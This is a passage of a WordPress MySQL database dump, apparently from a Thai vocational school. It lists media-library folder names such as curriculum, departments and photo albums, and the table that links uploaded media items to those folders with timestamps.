(25, 'Curriculum', 'curriculum', 15, 'folder', 1, '2018-02-16 08:24:52', '2021-04-19 14:22:22'),
(26, 'Subject Durable Articles 60', 'subject-durable-articles-60', 3, 'folder', 1, '2018-02-27 08:48:52', '2018-02-27 08:50:42'),
(27, 'Industrial', 'industrial', 26, 'folder', 2, '2018-02-27 08:53:21', '2018-02-27 08:53:21'),
(28, 'Commerce/Business Admin', 'commerce-business-admin', 26, 'folder', 2, '2018-02-28 05:58:16', '2018-02-28 05:58:16'),
(29, 'Home Economics', 'home-economics', 26, 'folder', 2, '2018-02-28 06:04:48', '2018-02-28 06:05:16'),
(30, 'Tourism Industry', 'tourism-industry', 26, 'folder', 2, '2018-02-28 06:10:48', '2018-02-28 06:11:05'),
(31, 'IT', 'it', 26, 'folder', 2, '2018-02-28 06:11:56', '2018-02-28 06:11:56'),
(33, 'Basic Subjects', 'basic-subjects-1', 26, 'folder', 2, '2018-02-28 06:18:35', '2018-02-28 06:18:35'),
(34, 'Plan & Cooperation', 'plan-amp-cooperation', 17, 'folder', 2, '2018-03-05 03:07:41', '2019-05-01 09:00:10'),
(35, 'Direstors', 'direstors', 17, 'folder', 2, '2018-03-13 04:44:59', '2019-05-01 08:59:21'),
(36, 'Admission 2018 - 2', 'admission-2018-2', 7, 'folder', 1, '2018-03-13 18:23:46', '2018-03-13 18:25:31'),
(38, 'Academic Works for Manager', 'academic-works-for-manager', 3, 'folder', 1, '2018-05-02 02:12:45', '2018-05-02 02:12:45'),
(39, 'Photo by Arun', 'photo-by-arun', 2, 'folder', 1, '2018-11-13 06:07:21', '2018-11-13 06:07:21'),
(40, 'Photo by Bundit', 'photo-by-bundit', 2, 'folder', 1, '2018-11-14 04:36:11', '2018-11-14 04:36:11'),
(41, 'Photo by Chanklang', 'photo-by-chanklang', 2, 'folder', 1, '2018-11-15 06:55:58', '2018-11-15 06:55:58'),
(42, 'ประกาศ อวท2561', '-2561', 2, 'folder', 1, '2018-11-16 02:13:02', '2018-11-16 02:13:02'),
(43, 'Photo by Roengrit&Roengchai', 'photo-by-roengrit-amp-roengchai', 42, 'folder', 2, '2018-11-16 07:08:05', '2019-06-12 09:12:24'),
(44, 'งานบุคลากร', '-41', 3, 'folder', 1, '2018-12-26 02:12:27', '2018-12-26 02:19:38'),
(45, 'งานพัสดุ', '-37', 3, 'folder', 1, '2018-12-26 02:14:54', '2018-12-26 02:20:57'),
(46, 'งานทะเบียน', '-38', 3, 'folder', 1, '2018-12-26 02:15:52', '2018-12-26 02:20:26'),
(49, 'งานอาคาร', '-39', 3, 'folder', 1, '2018-12-26 02:21:08', '2018-12-26 02:21:12'),
(50, 'งานแผนฯ', '-40', 3, 'folder', 1, '2018-12-26 02:22:50', '2018-12-26 02:22:53'),
(51, 'PLC', 'plc', 15, 'folder', 1, '2018-12-26 02:25:36', '2021-04-20 09:33:45'),
(52, 'ovt-2563', 'ovt-2563', 51, 'folder', 1, '2020-12-23 03:46:48', '2021-02-01 07:03:19');
-- --------------------------------------------------------
--
-- Table structure for table `wp_media_folder_file_relationship`
--
CREATE TABLE `wp_media_folder_file_relationship` (
`ff_relationship_id` mediumint(9) NOT NULL,
`media_id` int(11) NOT NULL,
`folderid` int(11) NOT NULL,
`addeddate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
--
-- Dumping data for table `wp_media_folder_file_relationship`
--
INSERT INTO `wp_media_folder_file_relationship` (`ff_relationship_id`, `media_id`, `folderid`, `addeddate`) VALUES
(1, 248, 1, '2018-01-06 02:47:23'),
(2, 247, 1, '2018-01-06 02:47:25'),
(3, 245, 1, '2018-01-06 02:47:28'),
(4, 243, 1, '2018-01-06 02:47:30'),
(5, 193, 1, '2018-01-06 02:47:37'),
(6, 192, 1, '2018-01-06 02:47:39'),
(7, 191, 1, '2018-01-06 02:47:41'),
(8, 152, 1, '2018-01-06 02:47:44'),
(9, 134, 1, '2018-01-06 02:47:47'),
(10, 133, 1, '2018-01-06 02:47:50'),
(11, 132, 1, '2018-01-06 02:47:54'),
(12, 131, 1, '2018-01-06 02:47:56'),
(13, 79, 1, '2018-01-06 02:47:59'),
(14, 266, 3, '2018-01-06 02:58:50'),
(15, 274, 2, '2018-01-06 03:21:05'),
(16, 285, 3, '2018-01-06 04:10:15'),
(17, 286, 3, '2018-01-06 07:04:04'),
(18, 294, 2, '2018-01-06 07:13:36'),
(19, 293, 2, '2018-01-06 07:13:38'),
(20, 292, 2, '2018-01-06 07:13:40'),
(21, 305, 8, '2018-01-06 07:35:18'),
(22, 319, 8, '2018-01-06 07:35:18'),
(23, 318, 8, '2018-01-06 07:35:18'),
(24, 317, 8, '2018-01-06 07:35:18'),
(25, 316, 8, '2018-01-06 07:35:18'),
(26, 315, 8, '2018-01-06 07:35:18'),
(27, 314, 8, '2018-01-06 07:35:18'),
(28, 313, 8, '2018-01-06 07:35:18'),
(29, 312, 8, '2018-01-06 07:35:18'),
(30, 311, 8, '2018-01-06 07:35:18'),
(31, 310, 8, '2018-01-06 07:35:18'),
(32, 309, 8, '2018-01-06 07:35:18'),
(33, 308, 8, '2018-01-06 07:35:18'),
(34, 307, 8, '2018-01-06 07:35:18'),
(35, 306, 8, '2018-01-06 07:35:18'),
(36, 300, 8, '2018-01-06 07:35:39'),
(37, 304, 8, '2018-01-06 07:35:39'),
(38, 303, 8, '2018-01-06 07:35:39'),
(39, 302, 8, '2018-01-06 07:35:39'),
(40, 301, 8, '2018-01-06 07:35:39'),
(41, 332, 9, '2018-01-06 08:03:27'),
(42, 333, 9, '2018-01-06 08:03:32'),
(43, 334, 9, '2018-01-06 08:03:37'),
(44, 335, 9, '2018-01-06 08:03:39'),
(45, 336, 9, '2018-01-06 08:03:41'),
(47, 337, 9, '2018-01-06 08:03:47'),
(49, 339, 9, '2018-01-06 08:03:52'),
(50, 338, 9, '2018-01-06 08:04:01'),
(51, 340, 9, '2018-01-06 08:04:03'),
(52, 341, 9, '2018-01-06 08:04:05'),
(53, 353, 10, '2018-01-06 08:14:46'),
(54, 352, 10, '2018-01-06 08:14:48'),
(55, 351, 10, '2018-01-06 08:14:51'),
(56, 350, 10, '2018-01-06 08:14:54'),
(57, 349, 10, '2018-01-06 08:14:56'),
(58, 348, 10, '2018-01-06 08:14:59'),
(59, 347, 10, '2018-01-06 08:15:01'),
(60, 346, 10, '2018-01-06 08:15:03'),
(61, 345, 10, '2018-01-06 08:15:06'),
(65, 344, 10, '2018-01-06 08:15:38'),
(69, 557, 3, '2018-01-09 03:03:24'),
(70, 559, 2, '2018-01-09 03:04:55'),
(81, 576, 3, '2018-01-10 07:07:39'),
(84, 577, 14, '2018-01-10 07:22:11'),
(85, 578, 14, '2018-01-10 07:22:14'),
(88, 580, 14, '2018-01-10 07:29:13'),
(89, 581, 14, '2018-01-10 07:29:14'),
(90, 588, 2, '2018-01-12 09:14:01'),
(91, 594, 1, '2018-01-12 10:15:23'),
(92, 592, 1, '2018-01-12 10:15:25'),
(93, 595, 1, '2018-01-12 10:15:28'),
(94, 593, 1, '2018-01-12 10:15:29'),
(95, 598, 1, '2018-01-12 10:21:58'),
(96, 629, 1, '2018-01-16 08:04:16'),
(97, 642, 15, '2018-01-18 11:22:02'),
(98, 641, 15, '2018-01-18 11:22:06'),
(99, 640, 15, '2018-01-18 11:22:09'),
(100, 639, 15, '2018-01-18 11:22:11'),
(101, 671, 15, '2018-01-19 06:46:38'),
(126, 675, 18, '2018-01-19 07:10:40'),
(129, 678, 18, '2018-01-19 07:10:46'),
(130, 680, 18, '2018-01-19 07:10:48'),
(131, 679, 18, '2018-01-19 07:10:50'),
(132, 683, 18, '2018-01-19 07:10:52'),
(133, 682, 18, '2018-01-19 07:10:54'),
(134, 681, 18, '2018-01-19 07:10:55'),
(135, 684, 18, '2018-01-19 07:10:57'),
(136, 685, 18, '2018-01-19 07:10:59'),
(137, 686, 18, '2018-01-19 07:11:01'),
(138, 676, 18, '2018-01-19 07:12:01'),
(139, 677, 18, '2018-01-19 07:12:05'),
(140, 703, 6, '2018-01-19 09:22:37'),
(141, 704, 6, '2018-01-19 09:22:38'),
(143, 777, 19, '2018-01-23 08:28:21'),
(146, 781, 20, '2018-01-23 08:44:14'),
(147, 782, 20, '2018-01-23 08:44:17'),
(148, 789, 3, '2018-01-24 08:11:19'),
(149, 792, 3, '2018-01-25 06:12:22'),
(150, 793, 3, '2018-01-25 06:12:23'),
(152, 799, 19, '2018-01-25 08:39:33'),
(154, 807, 19, '2018-01-29 04:34:32'),
(158, 823, 21, '2018-01-29 07:55:29'),
(160, 824, 21, '2018-01-29 07:56:49'),
(162, 825, 21, '2018-01-29 08:05:21'),
(179, 929, 3, '2018-01-31 08:27:40'),
(180, 835, 23, '2018-02-02 06:29:07'),
(181, 833, 23, '2018-02-02 06:29:08'),
(182, 834, 23, '2018-02-02 06:29:10'),
(183, 832, 23, '2018-02-02 06:29:13'),
(184, 831, 23, '2018-02-02 06:29:14'),
(185, 830, 23, '2018-02-02 06:29:15'),
(186, 827, 23, '2018-02-02 06:29:17'),
(187, 826, 23, '2018-02-02 06:29:18'),
(188, 822, 23, '2018-02-02 06:29:20'),
(204, 931, 21, '2018-02-02 06:30:56'),
(208, 940, 21, '2018-02-02 06:35:58'),
(211, 937, 24, '2018-02-05 04:13:39'),
(212, 938, 24, '2018-02-05 04:13:39'),
(213, 936, 24, '2018-02-05 04:13:42'),
(214, 939, 24, '2018-02-05 04:13:43'),
(215, 935, 24, '2018-02-05 04:13:44'),
(216, 934, 24, '2018-02-05 04:13:46'),
(217, 932, 24, '2018-02-05 04:13:50'),
(218, 933, 24, '2018-02-05 04:13:53'),
(219, 941, 24, '2018-02-05 04:13:57'),
(221, 947, 21, '2018-02-05 04:14:20'),
(235, 973, 21, '2018-02-06 03:34:31'),
(236, 974, 21, '2018-02-06 03:34:34'),
(237, 970, 21, '2018-02-06 03:34:36'),
(238, 971, 21, '2018-02-06 03:34:39'),
(239, 972, 21, '2018-02-06 03:34:41'),
(240, 969, 21, '2018-02-06 03:34:43'),
(241, 954, 21, '2018-02-06 03:34:46'),
(242, 953, 21, '2018-02-06 03:34:48'),
(243, 952, 21, '2018-02-06 03:34:51'),
(244, 1059, 3, '2018-02-11 07:31:00'),
(245, 1058, 3, '2018-02-11 07:31:03'),
(246, 1057, 3, '2018-02-11 07:31:13'),
(247, 1056, 3, '2018-02-11 07:31:15'),
(248, 1055, 3, '2018-02-11 07:31:20'),
(249, 1054, 3, '2018-02-11 07:31:24'),
(250, 1053, 3, '2018-02-11 07:31:28'),
(252, 1061, 14, '2018-02-11 07:43:05'),
(254, 1066, 7, '2018-02-11 07:57:31'),
(255, 1067, 7, '2018-02-11 07:57:31'),
(256, 1065, 7, '2018-02-11 07:57:37'),
(263, 1073, 14, '2018-02-11 08:36:20'),
(264, 1074, 14, '2018-02-11 08:36:26'),
(265, 1083, 3, '2018-02-14 05:51:34'),
(269, 1130, 3, '2018-02-16 07:57:44'),
(271, 1131, 25, '2018-02-16 08:25:19'),
(272, 1176, 25, '2018-02-16 11:35:35'),
(273, 1177, 25, '2018-02-16 11:35:44'),
(274, 1300, 3, '2018-02-22 07:31:57'),
(275, 1339, 25, '2018-02-23 09:01:23'),
(276, 1092, 21, '2018-02-26 06:51:11'),
(277, 1099, 21, '2018-02-26 06:51:13'),
(278, 1104, 21, '2018-02-26 06:51:17'),
(312, 991, 15, '2018-02-26 06:54:14'),
(313, 990, 15, '2018-02-26 06:54:16'),
(314, 989, 15, '2018-02-26 06:54:18'),
(315, 988, 15, '2018-02-26 06:54:20'),
(316, 985, 15, '2018-02-26 06:54:21'),
(317, 693, 2, '2018-02-26 06:54:24'),
(318, 1301, 3, '2018-02-26 06:54:32'),
(319, 1350, 3, '2018-02-26 06:57:56'),
(320, 1013, 25, '2018-02-26 06:58:05'),
(321, 1012, 25, '2018-02-26 06:58:10'),
(322, 1011, 25, '2018-02-26 06:58:12'),
(323, 1014, 25, '2018-02-26 06:58:14'),
(324, 1010, 25, '2018-02-26 06:58:16'),
(325, 1008, 25, '2018-02-26 06:58:21'),
(326, 1007, 25, '2018-02-26 06:58:22'),
(327, 1009, 25, '2018-02-26 06:58:28'),
(328, 1015, 25, '2018-02-26 06:58:30'),
(329, 1016, 25, '2018-02-26 06:58:34'),
(330, 1017, 25, '2018-02-26 06:58:38'),
(331, 1040, 25, '2018-02-26 06:58:40'),
(332, 260, 1, '2018-02-26 06:59:18'),
(333, 1368, 3, '2018-02-27 02:21:19'),
(334, 1371, 3, '2018-02-27 02:21:33'),
(335, 1375, 3, '2018-02-27 03:03:29'),
(336, 1385, 3, '2018-02-27 06:54:49'),
(349, 1396, 3, '2018-02-27 08:49:53'),
(350, 1394, 3, '2018-02-27 08:49:56'),
(351, 1390, 3, '2018-02-27 08:50:00'),
(352, 1388, 3, '2018-02-27 08:50:02'),
(363, 1409, 27, '2018-02-27 08:53:37'),
(364, 1408, 27, '2018-02-27 08:53:38'),
(365, 1407, 27, '2018-02-27 08:53:42'),
(366, 1406, 27, '2018-02-27 08:53:43'),
(367, 1405, 27, '2018-02-27 08:53:47'),
(368, 1404, 27, '2018-02-27 08:53:48'),
(369, 1403, 27, '2018-02-27 08:53:52'),
(370, 1402, 27, '2018-02-27 08:53:54'),
(371, 1401, 27, '2018-02-27 08:53:58'),
(372, 1400, 27, '2018-02-27 08:54:02'),
(383, 1420, 28, '2018-02-28 05:59:41'),
(384, 1419, 28, '2018-02-28 05:59:42'),
(385, 1418, 28, '2018-02-28 05:59:46'),
(386, 1417, 28, '2018-02-28 05:59:48'),
(387, 1416, 28, '2018-02-28 05:59:52'),
(394, 1425, 29, '2018-02-28 06:07:09'),
(395, 1424, 29, '2018-02-28 06:07:14'),
(396, 1423, 29, '2018-02-28 06:07:18'),
(405, 1428, 30, '2018-02-28 06:11:10'),
(406, 1427, 30, '2018-02-28 06:11:14'),
(407, 1429, 31, '2018-02-28 06:12:05'),
(408, 1430, 31, '2018-02-28 06:12:10'),
(421, 1431, 33, '2018-02-28 06:18:58'),
(422, 1432, 33, '2018-02-28 06:19:02'),
(423, 1433, 33, '2018-02-28 06:19:05'),
(424, 1434, 33, '2018-02-28 06:19:09'),
(425, 1435, 33, '2018-02-28 06:19:14'),
(426, 1436, 33, '2018-02-28 06:19:18'),
(443, 1612, 4, '2018-03-07 07:34:32'),
(444, 1610, 4, '2018-03-07 07:34:39'),
(445, 1570, 4, '2018-03-07 07:34:41'),
(446, 1569, 4, '2018-03-07 07:34:46'),
(447, 1567, 4, '2018-03-07 07:34:51'),
(448, 1563, 3, '2018-03-07 07:34:53'),
(449, 1555, 3, '2018-03-07 07:34:57'),
(450, 1554, 3, '2018-03-07 07:34:59'),
(451, 1522, 3, '2018-03-07 07:35:01'),
(452, 1519, 2, '2018-03-07 07:35:05'),
(464, 1447, 3, '2018-03-07 07:35:42'),
(465, 1446, 3, '2018-03-07 07:35:44'),
(466, 1442, 3, '2018-03-07 07:35:49'),
(467, 1413, 3, '2018-03-07 07:35:52'),
(477, 1702, 3, '2018-03-12 07:43:29'),
(478, 1701, 3, '2018-03-12 07:43:31'),
(479, 1700, 3, '2018-03-12 07:43:36'),
(497, 1670, 3, '2018-03-13 04:34:03'),
(498, 1669, 3, '2018-03-13 04:34:08'),
(499, 1668, 3, '2018-03-13 04:34:20'),
(500, 1667, 3, '2018-03-13 04:34:24'),
(501, 1666, 3, '2018-03-13 04:34:31'),
(502, 1665, 3, '2018-03-13 04:34:33'),
(503, 1664, 3, '2018-03-13 04:34:37'),
(506, 1626, 18, '2018-03-13 04:36:57'),
(507, 1623, 18, '2018-03-13 04:36:59'),
(508, 1620, 18, '2018-03-13 04:37:10'),
(509, 1619, 18, '2018-03-13 04:37:12'),
(510, 1615, 18, '2018-03-13 04:37:18'),
(511, 1614, 18, '2018-03-13 04:37:21'),
(512, 1607, 18, '2018-03-13 04:37:30'),
(513, 1606, 18, '2018-03-13 04:37:32'),
(514, 1603, 18, '2018-03-13 04:37:38'),
(515, 1600, 18, '2018-03-13 04:37:39'),
(516, 1597, 18, '2018-03-13 04:37:46'),
(517, 1594, 18, '2018-03-13 04:37:51'),
(518, 1592, 18, '2018-03-13 04:37:54'),
(519, 1590, 18, '2018-03-13 04:37:59'),
(520, 1503, 18, '2018-03-13 04:38:26'),
(521, 1496, 18, '2018-03-13 04:38:27'),
(522, 1493, 18, '2018-03-13 04:38:32'),
(523, 1483, 18, '2018-03-13 04:38:34'),
(524, 1478, 18, '2018-03-13 04:38:40'),
(525, 1473, 18, '2018-03-13 04:38:43'),
(526, 1469, 18, '2018-03-13 04:38:49'),
(527, 1467, 18, '2018-03-13 04:38:53'),
(528, 1456, 18, '2018-03-13 04:38:59'),
(529, 1454, 18, '2018-03-13 04:39:05'),
(530, 1452, 18, '2018-03-13 04:42:21'),
(531, 1348, 21, '2018-03-13 04:42:23'),
(532, 1743, 34, '2018-03-13 04:42:29'),
(533, 1656, 34, '2018-03-13 04:42:31'),
(534, 1755, 34, '2018-03-13 04:42:40'),
(535, 1657, 34, '2018-03-13 04:42:41'),
(536, 1347, 21, '2018-03-13 04:42:46'),
(537, 1346, 21, '2018-03-13 04:42:48'),
(538, 1345, 21, '2018-03-13 04:42:53'),
(539, 1344, 21, '2018-03-13 04:42:55'),
(540, 1332, 21, '2018-03-13 04:43:00'),
(541, 1230, 21, '2018-03-13 04:43:01'),
(542, 1224, 21, '2018-03-13 04:43:07'),
(543, 1222, 21, '2018-03-13 04:43:08'),
(544, 1218, 21, '2018-03-13 04:43:13'),
(545, 1214, 21, '2018-03-13 04:43:15'),
(546, 1204, 21, '2018-03-13 04:43:49'),
(547, 1203, 21, '2018-03-13 04:43:57'),
(548, 1202, 21, '2018-03-13 04:43:59'),
(549, 1201, 21, '2018-03-13 04:44:08'),
(550, 1200, 21, '2018-03-13 04:44:13'),
(551, 1198, 21, '2018-03-13 04:44:17'),
(552, 1197, 21, '2018-03-13 04:44:22'),
(553, 1193, 21, '2018-03-13 04:44:26'),
(554, 1169, 21, '2018-03-13 04:44:31'),
(555, 978, 35, '2018-03-13 04:45:22'),
(556, 979, 35, '2018-03-13 04:45:23'),
(557, 980, 35, '2018-03-13 04:45:25'),
(558, 981, 35, '2018-03-13 04:45:26'),
(559, 1509, 35, '2018-03-13 04:45:28'),
(580, 1647, 34, '2018-03-13 04:46:52'),
(581, 1646, 34, '2018-03-13 04:47:01'),
(582, 1648, 34, '2018-03-13 04:47:02'),
(583, 1650, 34, '2018-03-13 04:47:03'),
(584, 1639, 34, '2018-03-13 04:47:08'),
(585, 1638, 34, '2018-03-13 04:47:09'),
(586, 1642, 34, '2018-03-13 04:47:14'),
(587, 1635, 34, '2018-03-13 04:47:15'),
(588, 1643, 34, '2018-03-13 04:47:16'),
(589, 1632, 34, '2018-03-13 04:47:32'),
(590, 1631, 34, '2018-03-13 04:47:34'),
(591, 1633, 34, '2018-03-13 04:47:39'),
(592, 1652, 34, '2018-03-13 04:47:41'),
(593, 1654, 34, '2018-03-13 04:47:55'),
(594, 1655, 34, '2018-03-13 04:47:56'),
(612, 1812, 36, '2018-03-13 18:25:18'),
(613, 1813, 36, '2018-03-13 18:25:23'),
(621, 1803, 17, '2018-03-14 06:43:43'),
(622, 1800, 17, '2018-03-14 06:43:45'),
(623, 1799, 17, '2018-03-14 06:43:50'),
(624, 1798, 17, '2018-03-14 06:43:51'),
(625, 1795, 17, '2018-03-14 06:43:56'),
(626, 1794, 17, '2018-03-14 06:43:57'),
(627, 1793, 17, '2018-03-14 06:44:01'),
(628, 1780, 17, '2018-03-14 06:44:02'),
(629, 1779, 17, '2018-03-14 06:44:07'),
(630, 1778, 17, '2018-03-14 06:44:08'),
(631, 1777, 17, '2018-03-14 06:44:12'),
(632, 1776, 17, '2018-03-14 06:44:14'),
(633, 1775, 17, '2018-03-14 06:44:18'),
(634, 1774, 17, '2018-03-14 06:44:23'),
(635, 1773, 17, '2018-03-14 06:44:27'),
(636, 1772, 17, '2018-03-14 06:44:28'),
(637, 1771, 17, '2018-03-14 06:44:32'),
(638, 1770, 17, '2018-03-14 06:44:36'),
(639, 1769, 17, '2018-03-14 06:44:40'),
(640, 1768, 17, '2018-03-14 06:44:44'),
(641, 1767, 17, '2018-03-14 06:44:48'),
(642, 1766, 17, '2018-03-14 06:44:52'),
(643, 1765, 17, '2018-03-14 06:44:55'),
(644, 1764, 17, '2018-03-14 06:44:59'),
(645, 1835, 2, '2018-03-14 06:45:10'),
(648, 1832, 2, '2018-03-14 06:45:25'),
(649, 1831, 2, '2018-03-14 06:45:30'),
(650, 1902, 6, '2018-03-15 08:12:14'),
(651, 1899, 6, '2018-03-15 08:12:20'),
(652, 1895, 6, '2018-03-15 08:12:22'),
(653, 1892, 6, '2018-03-15 08:12:29'),
(654, 1891, 6, '2018-03-15 08:12:32'),
(655, 1890, 6, '2018-03-15 08:12:38'),
(656, 1889, 6, '2018-03-15 08:12:40'),
(657, 1888, 6, '2018-03-15 08:12:45'),
(659, 1887, 6, '2018-03-15 08:12:50'),
(661, 1886, 6, '2018-03-15 08:12:55'),
(662, 1885, 6, '2018-03-15 08:12:57'),
(663, 1884, 6, '2018-03-15 08:13:02'),
(664, 1883, 6, '2018-03-15 08:13:04'),
(665, 1878, 6, '2018-03-15 08:13:10'),
(666, 1874, 6, '2018-03-15 08:13:11'),
(667, 1873, 6, '2018-03-15 08:13:17'),
(668, 1872, 6, '2018-03-15 08:13:18'),
(669, 1871, 6, '2018-03-15 08:13:22'),
(670, 1870, 6, '2018-03-15 08:13:25'),
(671, 1869, 6, '2018-03-15 08:13:29'),
(672, 1868, 6, '2018-03-15 08:13:31'),
(673, 1867, 6, '2018-03-15 08:13:36'),
(674, 1866, 6, '2018-03-15 08:13:40'),
(675, 1865, 6, '2018-03-15 08:13:48'),
(676, 1862, 6, '2018-03-15 08:13:53'),
(677, 1852, 6, '2018-03-15 08:13:57'),
(678, 1830, 2, '2018-03-15 08:14:04'),
(680, 1829, 2, '2018-03-15 08:14:08'),
(681, 1828, 2, '2018-03-15 08:14:11'),
(682, 1827, 2, '2018-03-15 08:14:15'),
(684, 1826, 2, '2018-03-15 08:14:19'),
(685, 1825, 2, '2018-03-15 08:14:21'),
(686, 1824, 2, '2018-03-15 08:14:25'),
(687, 1823, 2, '2018-03-15 08:14:27'),
(688, 1822, 2, '2018-03-15 08:14:32'),
(689, 1821, 2, '2018-03-15 08:14:36'),
(690, 1820, 2, '2018-03-15 08:14:38'),
(691, 1819, 2, '2018-03-15 08:14:43'),
(692, 1974, 6, '2018-03-29 06:35:11'),
(693, 1965, 7, '2018-03-29 06:35:15'),
(694, 1964, 7, '2018-03-29 06:35:17'),
(695, 1963, 7, '2018-03-29 06:35:21'),
(696, 1962, 7, '2018-03-29 06:35:25'),
(697, 1959, 6, '2018-03-29 06:35:31'),
(698, 1956, 7, '2018-03-29 06:35:37'),
(699, 1953, 7, '2018-03-29 06:35:42'),
(700, 1948, 2, '2018-03-29 06:35:54'),
(701, 1946, 2, '2018-03-29 06:35:56'),
(702, 1944, 2, '2018-03-29 06:36:01'),
(703, 1942, 2, '2018-03-29 06:36:05'),
(704, 1928, 2, '2018-03-29 06:36:09'),
(705, 1924, 2, '2018-03-29 06:36:12'),
(706, 1923, 2, '2018-03-29 06:36:17'),
(707, 1920, 6, '2018-03-29 06:36:22'),
(708, 1905, 2, '2018-03-29 06:36:27'),
(709, 1904, 2, '2018-03-29 06:36:31'),
(713, 2052, 38, '2018-05-02 02:14:56'),
(715, 2067, 18, '2018-05-02 07:02:46'),
(716, 2163, 25, '2018-05-06 07:21:30'),
(717, 2162, 25, '2018-05-06 07:21:33'),
(718, 2161, 25, '2018-05-06 07:21:35'),
(719, 2160, 25, '2018-05-06 07:21:38'),
(720, 2159, 25, '2018-05-06 07:21:42'),
(721, 2158, 25, '2018-05-06 07:21:44'),
(722, 2157, 25, '2018-05-06 07:21:45'),
(723, 2156, 25, '2018-05-06 07:21:50'),
(724, 2165, 25, '2018-05-06 07:25:11'),
(725, 2701, 4, '2018-05-23 02:05:51'),
(726, 2703, 4, '2018-05-23 02:05:51'),
(727, 2702, 4, '2018-05-23 02:05:51'),
(728, 2700, 4, '2018-05-23 02:05:51'),
(729, 2699, 4, '2018-05-23 02:05:51'),
(730, 2698, 4, '2018-05-23 02:05:51'),
(731, 2697, 4, '2018-05-23 02:05:51'),
(732, 2696, 4, '2018-05-23 02:05:51'),
(733, 2695, 4, '2018-05-23 02:05:51'),
(734, 2694, 4, '2018-05-23 02:05:51'),
(735, 2693, 4, '2018-05-23 02:05:51'),
(736, 2692, 4, '2018-05-23 02:05:51'),
(737, 2691, 4, '2018-05-23 02:05:51'),
(738, 2690, 4, '2018-05-23 02:05:51'),
(739, 2689, 4, '2018-05-23 02:05:51'),
(740, 2688, 4, '2018-05-23 02:05:51'),
(741, 2687, 4, '2018-05-23 02:05:51'),
(742, 2686, 4, '2018-05-23 02:05:51'),
(743, 2685, 4, '2018-05-23 02:05:51'),
(744, 2684, 4, '2018-05-23 02:05:51'),
(745, 2683, 4, '2018-05-23 02:05:51'),
(746, 2682, 4, '2018-05-23 02:05:51'),
(747, 2681, 4, '2018-05-23 02:05:51'),
(748, 2680, 4, '2018-05-23 02:05:51'),
(749, 2679, 4, '2018-05-23 02:05:51'),
(750, 2678, 4, '2018-05-23 02:05:51'),
(751, 2677, 4, '2018-05-23 02:05:51'),
(752, 2676, 4, '2018-05-23 02:05:51'),
(753, 2675, 4, '2018-05-23 02:05:51'),
(754, 2674, 4, '2018-05-23 02:05:51'),
(755, 2673, 4, '2018-05-23 02:05:51'),
(756, 2672, 4, '2018-05-23 02:05:51'),
(757, 2671, 4, '2018-05-23 02:05:51'),
(758, 2670, 4, '2018-05-23 02:05:51'),
(759, 2669, 4, '2018-05-23 02:05:51'),
(760, 2668, 4, '2018-05-23 02:05:51'),
(761, 2667, 4, '2018-05-23 02:05:52'),
(762, 2666, 4, '2018-05-23 02:05:52'),
(763, 2665, 4, '2018-05-23 02:05:52'),
(764, 2664, 4, '2018-05-23 02:05:52'),
(765, 4140, 3, '2018-10-18 11:18:00'),
(766, 4340, 39, '2018-11-13 06:07:40'),
(767, 4339, 39, '2018-11-13 06:07:40'),
(768, 4338, 39, '2018-11-13 06:07:40'),
(769, 4337, 39, '2018-11-13 06:07:40'),
(770, 4336, 39, '2018-11-13 06:07:40'),
(771, 4335, 39, '2018-11-13 06:07:40'),
(772, 4334, 39, '2018-11-13 06:07:40'),
(773, 4333, 39, '2018-11-13 06:07:40'),
(774, 4332, 39, '2018-11-13 06:07:40'),
(775, 4331, 39, '2018-11-13 06:07:40'),
(776, 4330, 39, '2018-11-13 06:07:40'),
(777, 4329, 39, '2018-11-13 06:07:40'),
(778, 4328, 39, '2018-11-13 06:07:40'),
(779, 4327, 39, '2018-11-13 06:07:40'),
(780, 4326, 39, '2018-11-13 06:07:40'),
(781, 4325, 39, '2018-11-13 06:07:40'),
(782, 4324, 39, '2018-11-13 06:07:40'),
(783, 4323, 39, '2018-11-13 06:07:40'),
(784, 4322, 39, '2018-11-13 06:07:40'),
(785, 4321, 39, '2018-11-13 06:07:40'),
(786, 4320, 39, '2018-11-13 06:07:40'),
(787, 4319, 39, '2018-11-13 06:07:40'),
(788, 4318, 39, '2018-11-13 06:07:40'),
(789, 4317, 39, '2018-11-13 06:07:40'),
(790, 4316, 39, '2018-11-13 06:07:40'),
(791, 4315, 39, '2018-11-13 06:07:40'),
(792, 4314, 39, '2018-11-13 06:07:40'),
(793, 4313, 39, '2018-11-13 06:07:40'),
(847, 4438, 40, '2018-11-14 04:42:46'),
(848, 4456, 40, '2018-11-14 04:43:32'),
(849, 4455, 40, '2018-11-14 04:43:32'),
(850, 4454, 40, '2018-11-14 04:43:32'),
(851, 4453, 40, '2018-11-14 04:43:32'),
(852, 4452, 40, '2018-11-14 04:43:32'),
(853, 4451, 40, '2018-11-14 04:43:32'),
(854, 4450, 40, '2018-11-14 04:43:32'),
(855, 4449, 40, '2018-11-14 04:43:32'),
(856, 4448, 40, '2018-11-14 04:43:32'),
(857, 4447, 40, '2018-11-14 04:43:32'),
(858, 4446, 40, '2018-11-14 04:43:32'),
(859, 4445, 40, '2018-11-14 04:43:32'),
(860, 4444, 40, '2018-11-14 04:43:32'),
(861, 4443, 40, '2018-11-14 04:43:32'),
(862, 4442, 40, '2018-11-14 04:43:32'),
(863, 4441, 40, '2018-11-14 04:43:32'),
(864, 4440, 40, '2018-11-14 04:43:32'),
(865, 4439, 40, '2018-11-14 04:43:32'),
(866, 4437, 40, '2018-11-14 04:43:32'),
(873, 4461, 40, '2018-11-14 04:44:37'),
(874, 4462, 40, '2018-11-14 04:44:37'),
(875, 4460, 40, '2018-11-14 04:44:37'),
(876, 4459, 40, '2018-11-14 04:44:37'),
(877, 4458, 40, '2018-11-14 04:44:37'),
(878, 4457, 40, '2018-11-14 04:44:37'),
(904, 4486, 41, '2018-11-15 06:57:12'),
(905, 4493, 41, '2018-11-15 06:57:12'),
(906, 4492, 41, '2018-11-15 06:57:12'),
(907, 4491, 41, '2018-11-15 06:57:12'),
(908, 4490, 41, '2018-11-15 06:57:12'),
(909, 4488, 41, '2018-11-15 06:57:12'),
(910, 4487, 41, '2018-11-15 06:57:12'),
(911, 4485, 41, '2018-11-15 06:57:12'),
(912, 4499, 41, '2018-11-15 06:57:26'),
(913, 4505, 41, '2018-11-15 06:57:26'),
(914, 4504, 41, '2018-11-15 06:57:26'),
(915, 4503, 41, '2018-11-15 06:57:26'),
(916, 4502, 41, '2018-11-15 06:57:26'),
